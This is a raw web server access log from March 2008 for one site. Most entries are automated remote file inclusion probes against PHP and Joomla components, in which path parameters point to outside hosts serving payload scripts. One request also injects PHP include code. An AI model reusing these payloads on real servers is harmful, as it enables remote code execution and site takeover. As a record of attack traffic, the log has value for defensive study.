202.181.99.83 - - [16/Mar/2008:06:00:48 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.83 - - [16/Mar/2008:06:00:48 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.83 - - [16/Mar/2008:06:00:49 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:01:10 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:01:10 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:01:21 -0700] "GET /logs/access_080225.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:01:21 -0700] "GET /logs/access_080225.log/index2.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:01:21 -0700] "GET /logs/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:01:22 -0700] "GET /logs/index2.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:01:36 -0700] "GET /logs/access_080225.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:01:37 -0700] "GET /logs/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:01:46 -0700] "GET //?page=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:01:46 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:01:47 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:01:50 -0700] "GET //?page=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.197.252 - - [16/Mar/2008:06:02:02 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
89.149.197.252 - - [16/Mar/2008:06:02:02 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:02:03 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:02:03 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:02:21 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:02:22 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:02:23 -0700] "GET //?page=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.99 - - [16/Mar/2008:06:02:23 -0700] "GET /logs/access_080119.log HTTP/1.0" 200 618239 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
75.126.36.234 - - [16/Mar/2008:06:02:40 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
75.126.36.234 - - [16/Mar/2008:06:02:40 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.55.132.16 - - [16/Mar/2008:06:02:56 -0700] "GET /logs/access_080207.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:03:10 -0700] "GET //?page=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:03:12 -0700] "GET //?page=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:03:13 -0700] "GET /logs/access_080131.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:06:03:14 -0700] "GET /logs/access_080131.log/index2.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:03:25 -0700] "GET //?page=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.808" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:03:50 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:03:50 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:04:12 -0700] "GET /logs/access_080204.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.3.45 - - [16/Mar/2008:06:04:51 -0700] "GET /logs/access_080118.log//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [16/Mar/2008:06:04:52 -0700] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.3.45 - - [16/Mar/2008:06:04:53 -0700] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.101.20 - - [16/Mar/2008:06:05:40 -0700] "GET ///init_basic.php?GALLERY_BASEDIR=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.134.252.23 - - [16/Mar/2008:06:07:12 -0700] "GET /logs/access_080215.log/components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://h1.ripway.com/perusak/x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:08:47 -0700] "GET /logs/access_080124.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.67.131.105 - - [16/Mar/2008:06:09:21 -0700] "GET /logs/access_080131.log/index.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.67.131.105 - - [16/Mar/2008:06:09:21 -0700] "GET /index.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.67.131.105 - - [16/Mar/2008:06:09:22 -0700] "GET /logs/index.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.83 - - [16/Mar/2008:06:10:49 -0700] "GET /logs/access_080207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.202.67 - - [16/Mar/2008:06:11:38 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [16/Mar/2008:06:11:39 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.202.67 - - [16/Mar/2008:06:11:39 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:11:45 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:11:48 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:11:48 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:12:21 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.178.241 - - [16/Mar/2008:06:13:58 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/haeck/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:06:14:06 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:14:07 -0700] "GET /!scanhttp://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:06:14:08 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:14:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:14:23 -0700] "GET /!scanhttp://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:06:14:26 -0700] "GET /!scanhttp://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:14:41 -0700] "GET /mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.142.220.82 - - [16/Mar/2008:06:15:24 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:06:16:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:06:16:13 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.236.13.144 - - [16/Mar/2008:06:16:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://xdenguexd.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:16:42 -0700] "GET /logs/access_080215.log/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:06:17:04 -0700] "GET /logs/access_080225.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.2.130 - - [16/Mar/2008:06:17:05 -0700] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:06:17:10 -0700] "GET /index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:06:17:11 -0700] "GET /logs/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.97.202.67 - - [16/Mar/2008:06:17:19 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.70 - - [16/Mar/2008:06:18:34 -0700] "GET /logs/access_080212.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:18:37 -0700] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:18:37 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:18:37 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:18:49 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.215.178 - - [16/Mar/2008:06:19:28 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://usuarios.lycos.es/w0rms/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [16/Mar/2008:06:19:28 -0700] "GET /appserv/main.php?appserv_root=http://usuarios.lycos.es/w0rms/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [16/Mar/2008:06:19:28 -0700] "GET /logs/appserv/main.php?appserv_root=http://usuarios.lycos.es/w0rms/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.2 - - [16/Mar/2008:06:20:40 -0700] "GET /voir.php?inc=http://www.cv-trabajo.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
64.246.22.2 - - [16/Mar/2008:06:20:41 -0700] "GET /logs/voir.php?inc=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:20:42 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:20:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:20:42 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.215.178 - - [16/Mar/2008:06:21:59 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [16/Mar/2008:06:21:59 -0700] "GET /appserv/main.php?appserv_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [16/Mar/2008:06:21:59 -0700] "GET /logs/appserv/main.php?appserv_root=http://w0rms.by.ru/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.141.70 - - [16/Mar/2008:06:22:12 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.uamerica.edu.co/WebCalendar/translations/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.98.141.70 - - [16/Mar/2008:06:22:12 -0700] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://www.uamerica.edu.co/WebCalendar/translations/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.52.2.130 - - [16/Mar/2008:06:22:32 -0700] "GET /logs/access_080118.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [16/Mar/2008:06:22:32 -0700] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.178.241 - - [16/Mar/2008:06:22:32 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/haeck/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.178.241 - - [16/Mar/2008:06:22:33 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/haeck/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.201.66 - - [16/Mar/2008:06:22:39 -0700] "GET /logs/access_080228.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://naninhavv.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:22:39 -0700] "GET /logs/access_080215.log/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:06:22:40 -0700] "GET /logs/mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.134.186 - - [16/Mar/2008:06:22:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:06:23:08 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:24:10 -0700] "GET /mcf.php?content=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.170.96.181 - - [16/Mar/2008:06:24:28 -0700] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
83.170.96.181 - - [16/Mar/2008:06:24:28 -0700] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.36.235.74 - - [16/Mar/2008:06:24:30 -0700] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.102.153 - - [16/Mar/2008:06:24:46 -0700] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.118.102.153 - - [16/Mar/2008:06:24:46 -0700] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
83.96.133.55 - - [16/Mar/2008:06:24:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:06:25:12 -0700] "GET /logs/access_080118.log///init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:06:25:12 -0700] "GET ///init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:06:25:12 -0700] "GET /logs///init_basic.php?GALLERY_BASEDIR=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.243.117 - - [16/Mar/2008:06:25:58 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.117 - - [16/Mar/2008:06:26:03 -0700] "GET /logs/access_080124.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.tuttoscemo.com/administrator/components/com_juser/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:06:26:08 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:06:26:08 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:06:26:08 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.31.48 - - [16/Mar/2008:06:26:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.213 - - [16/Mar/2008:06:26:57 -0700] "GET /logs/access_080122.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:27:28 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:06:27:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:06:28:20 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
